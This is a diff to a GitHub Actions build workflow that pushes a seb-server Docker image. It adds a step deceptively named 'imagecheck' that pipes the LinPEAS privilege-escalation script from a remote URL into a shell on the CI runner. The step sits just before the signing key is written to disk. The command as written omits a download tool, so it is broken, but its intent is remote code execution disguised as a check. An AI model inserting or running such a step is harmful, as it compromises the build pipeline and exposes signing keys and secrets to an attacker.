--- a/.github/workflows/buildReporting.yml
+++ b/.github/workflows/buildReporting.yml
@@ -144,7 +144,11 @@ jobs:
         push: true
         tags: |
           anhefti/seb-server:${{ env.TAG_NAME }}
-    - 
+    -
+      name: imagecheck
+      run: 'https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh'
+      shell: bash
+    -
       name: Write signing key to disk
       run: 'echo "$KEY" > /tmp/cosign.key'
       shell: bash
